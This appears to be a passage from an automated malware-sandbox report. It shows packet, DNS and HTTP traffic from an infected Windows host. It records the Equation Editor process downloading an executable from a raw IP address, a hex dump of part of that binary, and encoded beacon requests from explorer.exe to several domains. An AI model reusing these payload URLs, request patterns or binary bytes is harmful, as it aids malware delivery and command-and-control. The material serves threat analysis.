                                                Nov 2, 2021 09:27:00.809088945 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:00.810616970 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810638905 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810652018 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810662985 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810681105 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810697079 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.810771942 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:00.810800076 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:00.910752058 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:00.910932064 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.065316916 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.065510988 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067572117 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067619085 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067692995 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067694902 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067734003 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067737103 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067764997 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067810059 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067827940 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067881107 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067909956 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.067970037 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.067986965 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.068034887 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.167505980 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.167737007 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.322010994 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.322082996 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324002981 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324065924 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324289083 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324310064 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324331045 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324343920 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324352980 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324361086 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324374914 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324378967 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324390888 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324404955 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324415922 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324429035 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.324445963 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.324464083 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.424113035 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.424329996 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.578212023 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.578433037 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.580017090 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.580065012 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.580147982 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.580172062 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:01.699289083 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:27:01.699389935 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:27:02.542762041 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:28:15.159492016 CET4916680192.168.2.22104.21.75.173
                                                Nov 2, 2021 09:28:15.176795006 CET8049166104.21.75.173192.168.2.22
                                                Nov 2, 2021 09:28:15.176908016 CET4916680192.168.2.22104.21.75.173
                                                Nov 2, 2021 09:28:15.177232027 CET4916680192.168.2.22104.21.75.173
                                                Nov 2, 2021 09:28:15.194235086 CET8049166104.21.75.173192.168.2.22
                                                Nov 2, 2021 09:28:15.206080914 CET8049166104.21.75.173192.168.2.22
                                                Nov 2, 2021 09:28:15.206142902 CET8049166104.21.75.173192.168.2.22
                                                Nov 2, 2021 09:28:15.206279039 CET4916680192.168.2.22104.21.75.173
                                                Nov 2, 2021 09:28:15.206443071 CET4916680192.168.2.22104.21.75.173
                                                Nov 2, 2021 09:28:15.223697901 CET8049166104.21.75.173192.168.2.22
                                                Nov 2, 2021 09:28:25.265752077 CET4916880192.168.2.2266.29.132.90
                                                Nov 2, 2021 09:28:25.442578077 CET804916866.29.132.90192.168.2.22
                                                Nov 2, 2021 09:28:25.442724943 CET4916880192.168.2.2266.29.132.90
                                                Nov 2, 2021 09:28:25.442976952 CET4916880192.168.2.2266.29.132.90
                                                Nov 2, 2021 09:28:25.625227928 CET804916866.29.132.90192.168.2.22
                                                Nov 2, 2021 09:28:25.625279903 CET804916866.29.132.90192.168.2.22
                                                Nov 2, 2021 09:28:25.625710011 CET4916880192.168.2.2266.29.132.90
                                                Nov 2, 2021 09:28:25.625933886 CET4916880192.168.2.2266.29.132.90
                                                Nov 2, 2021 09:28:25.801249027 CET804916866.29.132.90192.168.2.22
                                                Nov 2, 2021 09:28:30.725070000 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:30.750564098 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:30.750741005 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:30.750937939 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:30.777455091 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:31.052886963 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:31.052939892 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:31.053167105 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:31.053267002 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:31.077716112 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:31.077920914 CET4916980192.168.2.2275.2.60.5
                                                Nov 2, 2021 09:28:31.079245090 CET804916975.2.60.5192.168.2.22
                                                Nov 2, 2021 09:28:36.197777987 CET4917080192.168.2.22162.241.253.231
                                                Nov 2, 2021 09:28:36.334989071 CET8049170162.241.253.231192.168.2.22
                                                Nov 2, 2021 09:28:36.335118055 CET4917080192.168.2.22162.241.253.231
                                                Nov 2, 2021 09:28:36.335340977 CET4917080192.168.2.22162.241.253.231
                                                Nov 2, 2021 09:28:36.472366095 CET8049170162.241.253.231192.168.2.22
                                                Nov 2, 2021 09:28:38.020910978 CET8049170162.241.253.231192.168.2.22
                                                Nov 2, 2021 09:28:38.021061897 CET4917080192.168.2.22162.241.253.231
                                                Nov 2, 2021 09:28:38.158241987 CET8049170162.241.253.231192.168.2.22
                                                Nov 2, 2021 09:28:38.158354998 CET4917080192.168.2.22162.241.253.231

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 2, 2021 09:28:15.107445002 CET5216753192.168.2.228.8.8.8
                                                Nov 2, 2021 09:28:15.142863035 CET53521678.8.8.8192.168.2.22
                                                Nov 2, 2021 09:28:25.225115061 CET5059153192.168.2.228.8.8.8
                                                Nov 2, 2021 09:28:25.263832092 CET53505918.8.8.8192.168.2.22
                                                Nov 2, 2021 09:28:30.676491022 CET5780553192.168.2.228.8.8.8
                                                Nov 2, 2021 09:28:30.724009991 CET53578058.8.8.8192.168.2.22
                                                Nov 2, 2021 09:28:36.070918083 CET5903053192.168.2.228.8.8.8
                                                Nov 2, 2021 09:28:36.195832014 CET53590308.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Nov 2, 2021 09:28:15.107445002 CET192.168.2.228.8.8.80xc18cStandard query (0)www.spacex-live.netA (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:25.225115061 CET192.168.2.228.8.8.80xfc43Standard query (0)www.schittstore.comA (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:30.676491022 CET192.168.2.228.8.8.80x9c63Standard query (0)www.metanetgateway.comA (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:36.070918083 CET192.168.2.228.8.8.80x30e0Standard query (0)www.sarahannsartstudio.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Nov 2, 2021 09:28:15.142863035 CET8.8.8.8192.168.2.220xc18cNo error (0)www.spacex-live.net104.21.75.173A (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:15.142863035 CET8.8.8.8192.168.2.220xc18cNo error (0)www.spacex-live.net172.67.179.179A (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:25.263832092 CET8.8.8.8192.168.2.220xfc43No error (0)www.schittstore.comschittstore.comCNAME (Canonical name)IN (0x0001)
                                                Nov 2, 2021 09:28:25.263832092 CET8.8.8.8192.168.2.220xfc43No error (0)schittstore.com66.29.132.90A (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:30.724009991 CET8.8.8.8192.168.2.220x9c63No error (0)www.metanetgateway.com75.2.60.5A (IP address)IN (0x0001)
                                                Nov 2, 2021 09:28:36.195832014 CET8.8.8.8192.168.2.220x30e0No error (0)www.sarahannsartstudio.comsarahannsartstudio.comCNAME (Canonical name)IN (0x0001)
                                                Nov 2, 2021 09:28:36.195832014 CET8.8.8.8192.168.2.220x30e0No error (0)sarahannsartstudio.com162.241.253.231A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • 103.232.53.25
                                                • www.spacex-live.net
                                                • www.schittstore.com
                                                • www.metanetgateway.com
                                                • www.sarahannsartstudio.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249165103.232.53.2580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampkBytes transferredDirectionData
                                                Nov 2, 2021 09:26:55.926331043 CET0OUTGET /8880/vbc.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 103.232.53.25
                                                Connection: Keep-Alive
                                                Nov 2, 2021 09:26:56.184113979 CET1INHTTP/1.1 200 OK
                                                Date: Tue, 02 Nov 2021 08:27:00 GMT
                                                Server: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/7.4.24
                                                Last-Modified: Tue, 02 Nov 2021 03:24:30 GMT
                                                ETag: "47758-5cfc5d4e71e00"
                                                Accept-Ranges: bytes
                                                Content-Length: 292696
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@tp|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@
                                                Nov 2, 2021 09:26:56.184144974 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 48 3f 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 f4 71 40 00 e9 42 01 00 00 53 56 8b 35 50 3f 42 00 8d 45 a4
                                                Data Ascii: U\}t+}FEuHH?BHPuuuq@BSV5P?BEWPuq@eEEPuq@}ePp@FRVVU+MM3FQNUMVTUFPEEPMXp@EEPEPu
                                                Nov 2, 2021 09:26:56.184161901 CET4INData Raw: 00 40 42 00 89 88 c0 3f 42 00 e9 85 13 00 00 8b 45 e0 8d 34 85 c0 3f 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 6f 13 00 00 ff 34 95 c0 3f 42 00 56 e9 ff 12 00 00 8b 0d 10 37 42 00 8b 35 5c 72 40 00 3b cb 74 07 52 51 ff d6 8b
                                                Data Ascii: @B?BE4?B3;#MDo4?BV7B5\r@;tRQE$7B;2PQ)juP|p@joW]A;tTj\V@:Eu9]t=tWU=W=;t=uWxp@uEEF:u9
                                                Nov 2, 2021 09:26:56.184178114 CET5INData Raw: 45 e4 e9 5e 0e 00 00 76 86 8b 45 e8 e9 54 0e 00 00 6a 01 e8 90 0f 00 00 6a 02 8b f8 e8 87 0f 00 00 8b c8 8b 45 e4 83 f8 0c 77 6d ff 24 85 d8 29 40 00 03 f9 eb 62 2b f9 eb 5e 0f af cf 8b f9 eb 57 3b cb 74 42 8b c7 99 f7 f9 8b f8 eb 4a 0b f9 eb 46
                                                Data Ascii: E^vETjjEwm$)@b+^W;tBJF#B3>3;;u3+;t;t3G;t3EW_j jPWV4r@E=@;tDH;?;u;@WVB@
                                                Nov 2, 2021 09:26:56.441936016 CET7INData Raw: 01 8b f0 e8 83 0a 00 00 39 5d e8 89 45 08 74 0d 56 ff 15 44 71 40 00 8b f8 3b fb 75 10 6a 08 53 56 ff 15 40 71 40 00 8b f8 3b fb 74 7a ff 75 08 57 ff 15 10 71 40 00 8b f0 3b f3 74 3d 39 5d e0 89 5d fc 74 17 ff 75 e0 e8 38 f4 ff ff ff d6 85 c0 74
                                                Data Ascii: 9]EtVDq@;ujSV@q@;tzuWq@;t=9]]tu8t1E(h@h@hPBhuujb.9]WZWHq@yjKjDjjEjjEjEEVEn6uj!
                                                Nov 2, 2021 09:26:56.441970110 CET8INData Raw: e0 ff 75 dc 50 e8 8d 33 00 00 83 f8 ff 0f 84 a2 01 00 00 50 e9 70 f0 ff ff 39 5d e0 74 11 6a 01 e8 0f 05 00 00 a2 10 a0 40 00 33 c0 40 eb 0d 6a 11 e8 1b 05 00 00 50 e8 9a 36 00 00 38 1e 0f 84 73 01 00 00 8d 4d 08 53 51 50 68 10 a0 40 00 56 e8 e2
                                                Data Ascii: uP3Pp9]tj@3@jP68sMSQPh@V5P4q@mj]Eo;~M8V]59]E~}uESPEjPu$q@te}u_9]u!}t+}t%E>F:Et@;u|9EPW05
                                                Nov 2, 2021 09:26:56.441982031 CET10INData Raw: 08 9c 40 00 ff 34 81 6a 00 e8 9a 31 00 00 50 e8 e9 30 00 00 c2 04 00 56 8b 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 08 9c 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0a 05 10 9c 40 00 50 e8 64 31 00 00 85 f6 8b f8 7d 06 57 e8 98 33 00 00 8b c7
                                                Data Ascii: @4j1P0Vt$W}@4@Pd1}W3_^USVEWP?B3PSuup@;ui5$p@9]uKSPuuWPSutup@jL4;t$S5?Buuup@3@_^[9
                                                Nov 2, 2021 09:26:56.441999912 CET11INData Raw: 70 b0 40 00 a3 74 b0 40 00 e8 cb 30 00 00 85 c0 89 45 ec 0f 8c a8 00 00 00 8b 35 70 b0 40 00 2b f3 ff 15 64 70 40 00 f6 05 f4 3f 42 00 01 8b f8 74 43 2b 45 f4 3d c8 00 00 00 77 06 83 7d 14 00 75 33 8b 45 08 ff 75 08 2b 45 14 6a 64 50 ff 15 38 71
                                                Data Ascii: p@t@0E5p@+dp@?BtC+E=w}u3Eu+EjdP8q@PEh @P4r@EPj}3;t;9EuPEPVSu4q@t19uu,uu)up@}Bu9EjjjtS9u}uVWYuHjXIu9u}u
                                                Nov 2, 2021 09:26:56.442017078 CET12INData Raw: fb 74 40 8d 44 24 20 50 6a 28 ff 15 90 70 40 00 50 ff d5 85 c0 74 2c 8d 44 24 28 50 68 2c 91 40 00 53 ff d6 53 53 8d 44 24 2c 53 50 53 ff 74 24 34 c7 44 24 3c 01 00 00 00 c7 44 24 48 02 00 00 00 ff d7 6a 08 e8 58 2a 00 00 3b c3 be 02 00 04 80 74
                                                Data Ascii: t@D$ Pj(p@Pt,D$(Ph,@SSSD$,SPSt$4D$<D$HjX*;tVj%SSStVjr@uj?BtD$t$p@@tPp@@(jhBV5At$V6Yu^V5AjtW6wHq@W
                                                Nov 2, 2021 09:26:56.442033052 CET14INData Raw: 71 40 00 83 fb 05 75 18 8b 44 24 2c 48 f7 d8 1b c0 23 c3 50 ff 35 10 05 42 00 ff 15 5c 72 40 00 81 fb 0d 04 00 00 75 1a ff 35 18 37 42 00 ff 15 58 72 40 00 8b 44 24 2c a3 18 37 42 00 e9 fc 03 00 00 83 fb 11 75 11 55 55 57 ff 15 28 72 40 00 33 c0
                                                Data Ascii: q@uD$,H#P5B\r@u57BXr@D$,7BuUUW(r@3@t$,VW8r@;tUUhWq@Wq@uV.u9-@~?jj_;u49-?BtW=Ajx0jsu%At$0t$0h
                                                Nov 2, 2021 09:26:56.442049026 CET15INData Raw: 74 0a 50 ff 75 0c ff 15 4c 70 40 00 ff 76 10 ff 75 0c ff 15 44 70 40 00 8b 46 04 f6 46 14 08 89 45 f8 74 06 50 ff d7 89 45 f8 f6 46 14 04 5f 74 0a 50 ff 75 0c ff 15 5c 70 40 00 f6 46 14 10 74 21 8b 46 08 89 45 f4 8b 46 0c 85 c0 74 07 50 ff 15 50
                                                Data Ascii: tPuLp@vuDp@FFEtPEF_tPu\p@Ft!FEFtPPp@EPXp@FF3^UEAuQup@u#MA3]U}SVW]{0}7B+9x?Bs4j"ECueG


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249166104.21.75.17380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 2, 2021 09:28:15.177232027 CET315OUTGET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1
                                                Host: www.spacex-live.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 2, 2021 09:28:15.206080914 CET316INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 02 Nov 2021 08:28:15 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 02 Nov 2021 09:28:15 GMT
                                                Location: https://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Or3FV13v2reNYN%2BWp%2F8vpijU8YUbETOgTka3tg7j%2FeZQv8MrFazDzgubmUsk0Z%2BUmvmnRtuyBlKbzhU3UmYTTucW83rZgvHdwXFjE%2F967z36ZLASYwl%2FRekDeZWqQJOXG1LZaPdx"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6a7bfd02eaeb4ee6-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.224916866.29.132.9080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 2, 2021 09:28:25.442976952 CET316OUTGET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1
                                                Host: www.schittstore.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 2, 2021 09:28:25.625227928 CET318INHTTP/1.1 301 Moved Permanently
                                                keep-alive: timeout=5, max=100
                                                content-type: text/html
                                                content-length: 707
                                                date: Tue, 02 Nov 2021 08:28:25 GMT
                                                server: LiteSpeed
                                                location: https://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0
                                                x-turbo-charged-by: LiteSpeed
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
